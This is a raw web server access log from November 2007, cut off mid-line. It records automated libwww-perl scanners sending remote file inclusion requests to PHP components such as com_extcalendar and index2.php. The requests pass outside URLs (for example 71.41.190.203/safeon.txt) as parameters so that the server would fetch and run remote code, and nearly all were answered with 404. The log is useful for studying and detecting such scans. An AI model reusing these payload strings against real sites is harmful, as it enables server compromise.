213.194.124.84 - - [11/Nov/2007:19:08:07 -0800] "GET /logs/access_071008.log/components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5bLIB_DIR%5d=http://71.41.190.203/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
213.194.124.84 - - [11/Nov/2007:19:08:07 -0800] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5bLIB_DIR%5d=http://71.41.190.203/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
213.194.124.84 - - [11/Nov/2007:19:08:08 -0800] "GET /logs/components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5bLIB_DIR%5d=http://71.41.190.203/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
213.194.124.84 - - [11/Nov/2007:19:08:37 -0800] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5bLIB_DIR%5d=http://71.41.190.203/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
213.194.124.84 - - [11/Nov/2007:19:08:42 -0800] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5bLIB_DIR%5d=http://71.41.190.203/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.53.32.12 - - [11/Nov/2007:19:10:17 -0800] "GET /logs//oneadmin/calendar/include.php?path[docroot]=http://www.zooz.com.br/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.53.32.12 - - [11/Nov/2007:19:10:17 -0800] "GET //oneadmin/calendar/include.php?path[docroot]=http://www.zooz.com.br/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
168.100.192.66 - - [11/Nov/2007:19:12:07 -0800] "GET /logs/access_071015.log/index2.php?url_page=http://podlinov.ru/guestbook/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
168.100.192.66 - - [11/Nov/2007:19:12:08 -0800] "GET /logs/access_071105.log/index2.php?url_page=http://podlinov.ru/guestbook/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
198.66.208.57 - - [11/Nov/2007:19:12:37 -0800] "GET /logs/access_070716.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.tokyowww.com/alat/cmd? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
69.46.26.132 - - [11/Nov/2007:19:13:03 -0800] "GET /logs/access_070806.log/index2.php?url_page=http://71.41.190.203/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.46.26.132 - - [11/Nov/2007:19:13:03 -0800] "GET /index2.php?url_page=http://71.41.190.203/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.46.26.132 - - [11/Nov/2007:19:13:04 -0800] "GET /logs/index2.php?url_page=http://71.41.190.203/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.46.26.132 - - [11/Nov/2007:19:13:06 -0800] "GET /logs/access_070723.log/index2.php?url_page=http://71.41.190.203/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.46.26.132 - - [11/Nov/2007:19:13:37 -0800] "GET /logs/index2.php?url_page=http://71.41.190.203/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.46.26.132 - - [11/Nov/2007:19:13:37 -0800] "GET /logs/index2.php?url_page=http://podlinov.ru/guestbook/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.46.26.132 - - [11/Nov/2007:19:13:37 -0800] "GET /index2.php?url_page=http://71.41.190.203/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
69.46.26.132 - - [11/Nov/2007:19:13:37 -0800] "GET /index2.php?url_page=http://podlinov.ru/guestbook/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
65.39.140.181 - - [11/Nov/2007:19:13:48 -0800] "GET //mcf.php?content=http://www.neoncomanda.kit.net/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
198.66.208.57 - - [11/Nov/2007:19:14:30 -0800] "GET /logs/access_070820.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.tokyowww.com/alat/cmd? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
65.39.140.181 - - [11/Nov/2007:19:17:06 -0800] "GET /logs/access_071029.log//mcf.php?content=http://www.neoncomanda.kit.net/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
65.39.140.181 - - [11/Nov/2007:19:17:06 -0800] "GET /logs//mcf.php?content=http://www.neoncomanda.kit.net/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
69.46.26.132 - - [11/Nov/2007:19:17:44 -0800] "GET /logs/index1.php?dat=http://podlinov.ru/guestbook/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.46.26.132 - - [11/Nov/2007:19:17:44 -0800] "GET /index1.php?dat=http://podlinov.ru/guestbook/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.46.26.132 - - [11/Nov/2007:19:18:46 -0800] "GET /logs/index2.php?url_page=http://podlinov.ru/guestbook/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.46.26.132 - - [11/Nov/2007:19:18:46 -0800] "GET /index2.php?url_page=http://podlinov.ru/guestbook/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.46.26.132 - - [11/Nov/2007:19:18:47 -0800] "GET /logs/index2.php?url_page=http://podlinov.ru/guestbook/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
69.46.26.132 - - [11/Nov/2007:19:18:47 -0800] "GET /index2.php?url_page=http://podlinov.ru/guestbook/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
68.180.250.81 - - [11/Nov/2007:19:18:57 -0800] "GET /logs/access_071015.log HTTP/1.0" 200 524288 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
69.46.26.132 - - [11/Nov/2007:19:19:57 -0800] "GET /logs/access_071015.log/index2.php?url_page=http://podlinov.ru/guestbook/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.46.26.132 - - [11/Nov/2007:19:19:57 -0800] "GET /logs/access_071105.log/index2.php?url_page=http://podlinov.ru/guestbook/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.151.94.18 - - [11/Nov/2007:19:20:04 -0800] "GET //mo